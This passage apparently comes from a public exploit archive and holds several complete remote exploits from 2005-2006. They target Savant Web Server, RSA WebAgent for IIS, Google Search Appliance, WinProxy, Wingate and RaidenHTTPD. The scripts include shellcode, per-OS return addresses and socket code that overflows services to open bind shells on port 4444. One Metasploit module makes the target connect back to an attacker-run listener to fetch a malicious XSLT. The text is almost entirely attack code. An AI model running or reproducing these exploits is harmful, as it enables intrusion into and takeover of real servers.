memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
port=atoi(argv[2]);
tcp.sin_port=htons(port);
printf("\n[+] attacking host %s\n" , argv[1]) ;
Sleep(1000);
printf("[+] packet size = %d byte\n" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1000) ;
printf("[+] connected\n") ;
printf("[+] sending the overflow string\n") ;
send(sock,buffer,strlen(buffer),0);
printf("[+] exploit sent successfully try telnet %s 4444\n" , argv[1]);
}
else {
printf("[-] ouch! Server is not listening .... \n");
}
shutdown(sock,1);
closesocket(sock);
}
// EO exploit code
// [2005-04-20]
80 Savant Web Server 3.1 Remote Buffer Overflow Exploit
#!/usr/local/bin/perl
#
# Savant Buffer Overflow Exploit
# ----------------------------------
# Infam0us Gr0up - Securiti Research
#
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
# Vendor URL: http://savant.sourceforge.net
#
$ARGC=@ARGV;
if ($ARGC !=3) {
print "\nUsage: $0 [remote IP] [Port]\n";
print "Example: $0 127.0.0.1 80 1\n";
print "\nsystem:\n";
print " 1 - Windows 2000 SP4\n";
print " 2 - winXP sp1\n";
print "\n";
exit;
}
use Socket;
$x90 = "\x90"x13;
$pack_ret = pack('l', ($ret));
if($sistem==1){$ret = 0x77e14c29;} # Windows 2000 SP4
if($sistem==2){$ret = 0x77fb59cc;} # winXP sp1
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port =$ARGV[1];
$sistem = $ARGV[2];
print "\n";
print "[+] Connect to $remote..\n";
$iaddr = inet_aton($remote) or die "[-] Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "[-] Error: $!";
$proto = getprotobyname('tcp') or die "[-] Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "[-] Error: $!";
connect(SOCK, $paddr) or die "[-] Error: $!";
print "[+] Connected\n";
print "[+] Build shellcode..\n";
my $shellcode =
"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x94".
"\xd3\x48\xef\x83\xeb\xfc\xe2\xf4\x68\xb9\xa3\xa2\x 7c\x2a\xb7\x10".
"\x6b\xb3\xc3\x83\xb0\xf7\xc3\xaa\xa8\x58\x34\xea\x ec\xd2\xa7\x64".
"\xdb\xcb\xc3\xb0\xb4\xd2\xa3\xa6\x1f\xe7\xc3\xee\x 7a\xe2\x88\x76".
"\x38\x57\x88\x9b\x93\x12\x82\xe2\x95\x11\xa3\x1b\x af\x87\x6c\xc7".
"\xe1\x36\xc3\xb0\xb0\xd2\xa3\x89\x1f\xdf\x03\x64\x cb\xcf\x49\x04".
"\x97\xff\xc3\x66\xf8\xf7\x54\x8e\x57\xe2\x93\x8b\x 1f\x90\x78\x64".
"\xd4\xdf\xc3\x9f\x88\x7e\xc3\xaf\x9c\x8d\x20\x61\x da\xdd\xa4\xbf".
"\x6b\x05\x2e\xbc\xf2\xbb\x7b\xdd\xfc\xa4\x3b\xdd\x cb\x87\xb7\x3f".
"\xfc\x18\xa5\x13\xaf\x83\xb7\x39\xcb\x5a\xad\x89\x 15\x3e\x40\xed".
"\xc1\xb9\x4a\x10\x44\xbb\x91\xe6\x61\x7e\x1f\x10\x 42\x80\x1b\xbc".
"\xc7\x90\x1b\xac\xc7\x2c\x98\x87\xeb\xd3\x48\xee\x f2\xbb\x4f\x53".
"\xf2\x80\xc1\x0e\x01\xbb\xa4\x16\x3e\xb3\x1f\x10\x 42\xb9\x58\xbe".
"\xc1\x2c\x98\x89\xfe\xb7\x2e\x87\xf7\xbe\x22\xbf\x cd\xfa\x84\x66".
"\x73\xb9\x0c\x66\x76\xe2\x88\x1c\x3e\x46\xc1\x12\x 6a\x91\x65\x11";
# If Savant can serve HTTP requests with a server socket to receive the requests,
# the Savant server will keep online when this error occurs.
# Most often, this can by try to simultaneously run two web servers.
# Also this could Allows attacker to bind a port
$sploit =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x 24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x 20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x 07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x 24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x 6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x 1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x 66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x 3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\x d0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x 43\x53\xff\xd0".
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x 70\xc7\x57\xff".
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x 57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x 54\x54\x55\xff".
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\x d0\x66\x6a\x64".
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\x e7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x 8d\x7a\x38\xab".
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x 5b\x57\x52\x51".
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\x d9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\x c4\x64\xff\xd6".
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\x d0";
$all = $x90.$shellcode;
$get = "GET /$x90.$shellcode.$sp4 \r\n\n";
$shell = $pack_ret.$sploit.$x90;
print "[+] Sending overflOw..\n";
send(SOCK, $get, 0) or die "[-] Failed query: $!";
sleep(1);
print "[+] Server Overflow!\n";
print "[+] Send SplOit..\n";
send(SOCK, $shell, 0) or die "[-] Failed query: $!";
sleep(1);
print "[+] Granted!\n";
close(SOCK);
print "[~] Trying connect $remote port 4444\n";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => "4444", Photo => tcp)
|| die "[-] FAILED ...\n";
close($socket);
print "[+] PWNED rulz port 4444 ...\n";
exit;
// [2005-08-30]
80 MS Windows IIS SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::rsa_iiswebagent_redirect;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'IIS RSA WebAgent Redirect Overflow',
'Version' => '$Revision: 1.4 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'SSL' => [0, 'BOOL', 'Use SSL'],
'URL' => [1, 'DATA', 'The path to the DLL', '/WebID/IISWebAgentIF.dll'],
},
'Payload' =>
{
'Space' => 1024,
'BadChars' =>
"\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x 2f".
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x5c". "Z",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the SecurID Web Agent for IIS.
This ISAPI filter runs in-process with inetinfo.exe, any attempt to
exploit this flaw will result in the termination and potential restart
of the IIS service.
}),
'Refs' =>
[
# Anyone got a patch/advisory/solution URL?
],
'Targets' =>
[
# Version-specific return addresses
['RSA WebAgent 5.2', 996, 0x1001e694],
['RSA WebAgent 5.3', 992, 0x10010e89],
# Generic return addresses
['RSA WebAgent 5.2 on Windows 2000 English', 996, 0x75022ac4],
['RSA WebAgent 5.3 on Windows 2000 English', 992, 0x75022ac4],
['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', 996, 0x71ab1d54],
['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', 992, 0x71ab1d54],
['RSA WebAgent 5.2 on Windows XP SP2 English', 996, 0x71ab9372],
['RSA WebAgent 5.3 on Windows XP SP2 English', 992, 0x71ab9372],
['RSA WebAgent 5.2 on Windows 2003 English SP0', 996, 0x7ffc0638],
['RSA WebAgent 5.3 on Windows 2003 English SP0', 992, 0x7ffc0638],
],
'Keys' => ['rsa'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("GET ".$self->GetVar('URL')."?GetPic?image=msf HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n");
my $r = $s->Recv(-1, 5);
if ($r =~ /RSA Web Access Authentication/)
{
$self->PrintLine(" Found IISWebAgentIF.dll ;)");
return $self->CheckCode('Detected');
} else {
$self->PrintLine("The IISWebAgentIF.dll ISAPI does not appear to be installed");
return $self->CheckCode('Safe');
}
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[ $target_idx ];
$self->PrintLine(" Attempting to exploit target ".$target->[0]);
my $pattern = Pex::Text::AlphaNumText(8192);
# Just don't ask.
$pattern =~ s/\d|Z/A/ig;
substr($pattern, $target->[1] , 4, pack('V', $target->[2]));
substr($pattern, $target->[1] - 4, 2, "\xeb\x06");
substr($pattern, $target->[1] + 4, length($shellcode), $shellcode);
my $request =
"GET ".$self->GetVar('URL')."?Redirect?url=$pattern HTTP/1.1\r\n".
"Host: $target_host:$target_port\r\n\r\n";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine(" Sending " .length($request) . " bytes to remote host.");
$s->Send($request);
$self->PrintLine(" Waiting for a response...");
$s->Recv(-1, 10);
$self->Handler($s);
$s->Close();
return;
}
# [2005-10-19]
80 Google Search Appliance proxystylesheet XSLT Java Code Execution
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::google_proxystylesheet_exec;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket;
use IO::Select;
my $advanced = { };
my $info =
{
'Name' => 'Google Appliance ProxyStyleSheet Command Execution',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits a feature in the Saxon XSLT parser used by
the Google Search Appliance. This feature allows for arbitrary
java methods to be called. Google released a patch and advisory to
their client base in August of 2005 (GA-2005-08-m). The target appliance
must be able to connect back to your machine for this exploit to work.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'],
'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80],
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],
},
'Payload' =>
{
'Space' => 1024,
'Keys' => [ 'cmd' ],
},
'Refs' =>
[
['OSVDB', 20981],
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'Google Search Appliance']
],
'Keys' => [ 'google' ],
'DisclosureDate' => 'Aug 16 2005',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Check {
my $self = shift;
my $s = $self->ConnectSearch;
if (! $s) {
return $self->CheckCode('Connect');
}
my $url =
"/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&".
"site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
"output=xml_no_dtd&".
"q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
"proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/";
$s->Send("GET $url HTTP/1.0\r\n\r\n");
my $page = $s->Recv(-1, 5);
$s->Close;
if ($page =~ /cannot be resolved to an ip address/) {
$self->PrintLine(" This system appears to be vulnerable >:-)");
return $self->CheckCode('Confirmed');
}
if ($page =~ /ERROR: Unable to fetch the stylesheet/) {
$self->PrintLine(" This system appears to be patched");
}
$self->PrintLine(" This system does not appear to be vulnerable");
return $self->CheckCode('Safe');
}
sub Exploit
{
my $self = shift;
my ($s, $page);
# Request the index page to obtain a redirect response
$s = $self->ConnectSearch || return;
$s->Send("GET / HTTP/1.0\r\n\r\n");
$page = $s->Recv(-1, 5);
$s->Close;
# Parse the redirect to get the client and site values
my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&]+)\&/im;
if (! $goog_site || ! $goog_clnt) {
$self->PrintLine(" Invalid response to our request, is this a Google appliance?");
#$self->PrintLine($page);
#!!! return;
$goog_site = 'test';
$goog_clnt = 'test';
}
# Create the listening local socket that will act as our HTTP server
my $lis = IO::Socket::INET->new(
LocalHost => $self->GetVar('HTTPHOST'),
LocalPort => $self->GetVar('HTTPPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp');
if (not defined($lis)) {
$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
return;
}
my $sel = IO::Select->new($lis);
# Send a search request with our own address in the proxystylesheet parameter
my $query = Pex::Text::AlphaNumText(int(rand(32))+1);
my $proxy =
"http://".
($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))).
":".$self->GetVar('HTTPPORT')."/".Pex::Text::AlphaNumText(int(rand(15))+1).".xsl";
my $url =
"/search?client=". $goog_clnt ."&site=". $goog_site .
"&output=xml_no_dtd&proxystylesheet=". $proxy .
"&q=". $query ."&proxyreload=1";
$self->PrintLine(" Sending our malicious search request...");
$s = $self->ConnectSearch || return;
$s->Send("GET $url HTTP/1.0\r\n\r\n");
$page = $s->Recv(-1, 3);
$s->Close;
$self->PrintLine(" Listening for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ...");
# Did we receive a connection?
my @r = $sel->can_read(30);
if (! @r) {
$self->PrintLine(" No connection received from the search engine, possibly patched.");
$lis->close;
return;
}
my $c = $lis->accept();
if (! $c) {
$self->PrintLine(" No connection received from the search engine, possibly patched.");
$lis->close;
return;
}
my $cli = Msf::Socket::Tcp->new_from_socket($c);
$self->PrintLine(" Connection received from ".$cli->PeerAddr."...");
$self->ProcessHTTP($cli);
return;
}
sub ConnectSearch {
my $self = shift;
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
'SSL' => $self->GetVar('SSL')
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
return $s;
}
sub ProcessHTTP
{
my $self = shift;
my $cli = shift;
my $targetIdx = $self->GetVar('TARGET');
my $target = $self->Targets->[$targetIdx];
my $ret = $target->[1];
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $content;
my $rhost;
my $rport;
# Read the first line of the HTTP request
my ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10));
# The way we call Runtime.getRuntime().exec, Java will split
# our string on whitespace. Since we are injecting via XSLT,
# inserting quotes becomes a huge pain, so we do this...
my $exec_str =
'/usr/bin/perl -e system(pack(qq{H*},qq{' .
unpack("H*", $self->GetVar('EncodedPayload')->RawPayload).
'}))';
# Load the template from our data section, we have to manually
# seek and reposition to allow the exploit to be used more
# than once without a reload.
seek(DATA, 0, 0);
while(<DATA>) { last if /^__DATA__$/ }
while(<DATA>) { $content .= $_ }
# Insert our command line
$content =~ s/:x:MSF:x:/$exec_str/;
# Send it to the requesting appliance
$rport = $cli->PeerPort;
$rhost = $cli->PeerAddr;
$self->PrintLine(" HTTP Client connected from $rhost, sending XSLT...");
my $res = "HTTP/1.1 200 OK\r\n" .
"Content-Type: text/html\r\n" .
"Content-Length: " . length($content) . "\r\n" .
"Connection: close\r\n" .
"\r\n" .
$content;
$self->PrintLine(" Sending ".length($res)." bytes...");
$cli->Send($res);
$cli->Close;
}
1;
# [2005-11-20]
80 BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit
#!perl
#
# "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit
#
# Author: Fist****er (aka FistFuXXer)
# e-Mail: [email protected]
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
#
# CVE info:
# CAN-2005-4085
#
use IO::Socket;
#
# destination IP address
#
$ip = '127.0.0.1';
#
# destination TCP port
#
$port = 80;
#
# SE handler. 0x00, 0x0a, 0x0d free
#
$seh = reverse( "\x01\x03\x12\x40" ); # POP/POP/RET
# PAVDLL.01031240
#
# JMP SHORT to shellcode. 0x00, 0x0a, 0x0d free
#
$jmp = "\x90\x90\xeb\x32"; # [NOP][NOP][JMP|JMP]
#
# 0x00, 0x0a, 0x0d free shellcode
#
# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
#
$sc = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x26".
"\x8c\x6d\xa3\x83\xeb\xfc\xe2\xf4\xda\xe6\x86\xee\x ce\x75\x92\x5c".
"\xd9\xec\xe6\xcf\x02\xa8\xe6\xe6\x1a\x07\x11\xa6\x 5e\x8d\x82\x28".
"\x69\x94\xe6\xfc\x06\x8d\x86\xea\xad\xb8\xe6\xa2\x c8\xbd\xad\x3a".
"\x8a\x08\xad\xd7\x21\x4d\xa7\xae\x27\x4e\x86\x57\x 1d\xd8\x49\x8b".
"\x53\x69\xe6\xfc\x02\x8d\x86\xc5\xad\x80\x26\x28\x 79\x90\x6c\x48".
"\x25\xa0\xe6\x2a\x4a\xa8\x71\xc2\xe5\xbd\xb6\xc7\x ad\xcf\x5d\x28".
"\x66\x80\xe6\xd3\x3a\x21\xe6\xe3\x2e\xd2\x05\x2d\x 68\x82\x81\xf3".
"\xd9\x5a\x0b\xf0\x40\xe4\x5e\x91\x4e\xfb\x1e\x91\x 79\xd8\x92\x73".
"\x4e\x47\x80\x5f\x1d\xdc\x92\x75\x79\x05\x88\xc5\x a7\x61\x65\xa1".
"\x73\xe6\x6f\x5c\xf6\xe4\xb4\xaa\xd3\x21\x3a\x5c\x f0\xdf\x3e\xf0".
"\x75\xdf\x2e\xf0\x65\xdf\x92\x73\x40\xe4\x7c\xff\x 40\xdf\xe4\x42".
"\xb3\xe4\xc9\xb9\x56\x4b\x3a\x5c\xf0\xe6\x7d\xf2\x 73\x73\xbd\xcb".
"\x82\x21\x43\x4a\x71\x73\xbb\xf0\x73\x73\xbd\xcb\x c3\xc5\xeb\xea".
"\x71\x73\xbb\xf3\x72\xd8\x38\x5c\xf6\x1f\x05\x44\x 5f\x4a\x14\xf4".
"\xd9\x5a\x38\x5c\xf6\xea\x07\xc7\x40\xe4\x0e\xce\x af\x69\x07\xf3".
"\x7f\xa5\xa1\x2a\xc1\xe6\x29\x2a\xc4\xbd\xad\x50\x 8c\x72\x2f\x8e".
"\xd8\xce\x41\x30\xab\xf6\x55\x08\x8d\x27\x05\xd1\x d8\x3f\x7b\x5c".
"\x53\xc8\x92\x75\x7d\xdb\x3f\xf2\x77\xdd\x07\xa2\x 77\xdd\x38\xf2".
"\xd9\x5c\x05\x0e\xff\x89\xa3\xf0\xd9\x5a\x07\x5c\x d9\xbb\x92\x73".
"\xad\xdb\x91\x20\xe2\xe8\x92\x75\x74\x73\xbd\xcb\x 58\x54\x8f\xd0".
"\x75\x73\xbb\x5c\xf6\x8c\x6d\xa3";
print '"WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit'."\n\n";
$sock = IO::Socket::INET->new
(
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
Timeout => 2
) or print '[-] Error: Could not establish a connection to the server!' and exit(1);
print "[+] Connected.\n";
print "[+] Trying to overwrite SE handler...\n";
$sock->send( "GET / HTTP/1.0\r\n" );
$sock->send( 'Host: 127.0.0.1:'. "\x90" x 23 . $jmp . $seh . "\x90" x 50 . $sc ."\r\n\r\n" );
print "[+] Done. Now check for bind shell on $ip:4444!";
close($sock);
# [2006-01-07]
80 QBik Wingate 6.1.1.1077 (POST) Remote Buffer Overflow Exploit
### *** Proof of concept (not for "in the wild" kiddies) ***
### QBik Wingate version 6.1.1.1077 remote exploit for Win2k SP4 (german)
### by kcope in 2006
###
use IO::Socket;
if ($ARGV[0] eq "")
{
print "param1 = remote host";
exit;
}
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x36\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x56\x4b\x58".
"\x4e\x46\x46\x32\x46\x52\x4b\x48\x45\x44\x4e\x33\x 4b\x38\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x 4a\x31\x4b\x58".
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x58\x 46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x 46\x58\x42\x4c".
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x 44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x52\x4a\x32\x45\x57\x 45\x4e\x4b\x58".
"\x4f\x35\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x 4e\x50\x4b\x34".
"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x30\x 4e\x52\x4b\x58".
"\x49\x48\x4e\x46\x46\x32\x4e\x31\x41\x36\x43\x4c\x 41\x43\x4b\x4d".
"\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x58\x42\x34\x 4e\x30\x4b\x48".
"\x42\x47\x4e\x31\x4d\x4a\x4b\x58\x42\x54\x4a\x30\x 50\x35\x4a\x46".
"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x 48\x4d\x48\x46".
"\x43\x35\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x46\x 47\x47\x43\x47".
"\x44\x33\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x 4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x 49\x38\x45\x4e".
"\x48\x36\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x55\x 4c\x46\x44\x30".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x 4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x55\x43\x35\x43\x35\x43\x55\x 43\x35\x43\x44".
"\x43\x35\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x 4a\x46\x41\x31".
"\x4e\x45\x48\x56\x43\x55\x49\x48\x41\x4e\x45\x59\x 4a\x46\x46\x4a".
"\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x 4c\x56\x42\x51".
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x 4d\x4a\x50\x52".
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x45\x 4f\x4f\x42\x4d".
"\x4a\x36\x45\x4e\x49\x54\x48\x48\x49\x54\x47\x35\x 4f\x4f\x48\x4d".
"\x42\x35\x46\x35\x46\x55\x45\x55\x4f\x4f\x42\x4d\x 43\x59\x4a\x46".
"\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x35\x4f\x4f\x 48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x 4a\x56\x43\x46".
"\x4d\x46\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x 49\x52\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x38\x44\x4e\x 41\x43\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x42\x50\x4f\x 44\x54\x4e\x32".
"\x43\x39\x4d\x58\x4c\x47\x4a\x53\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x46".
"\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x 46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x55\x41\x35\x 41\x35\x4c\x56".
"\x41\x30\x41\x55\x41\x55\x45\x55\x41\x55\x4f\x4f\x 42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x 48\x4d\x4c\x36".
"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x 47\x45\x4e\x4f".
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x35\x 4f\x4f\x42\x4d".
"\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x35\x43\x35\x 4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');
$ret = "\x4b\x4f\x9e\x01"; # JMP ESI Win2k SP4 German
$x = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKK LLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSAAAAUUUUVVVVWWWWXX XXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKK LLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSBBBBUUUUVVVVWWWWXX XXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKK LLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS".$ret."UUUUVVVVWWWWXXXXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKK LLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSDDDDUUUUVVVVWWWWXX XXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKK LLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSEEEEUUUUVVVVWWWWXX XXYYYYZZZZ";
$a = "A" x 2000 . $x . "\x90" x 100 . $shellcode;
print $sock "POST http://$a/ HTTP/1.0\r\n\r\n";
while (<$sock>) {
print;
}
# [2006-06-07]
80 RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution Exploit
#!/usr/bin/php -q -d short_open_tag=on
<?
print_r('
-----------------------------------------------------------------------------
RaidenHTTPD/1.1.49 remote commands execution exploit
by rgod [email protected]
site: http://retrogod.altervista.org
dork: Powered.by.RaidenHTTPD +intitle:index.of | inurl:raidenhttpd-admin
-johnny -GHDB
-----------------------------------------------------------------------------
');
if ($argc<3) {
print_r('
-----------------------------------------------------------------------------
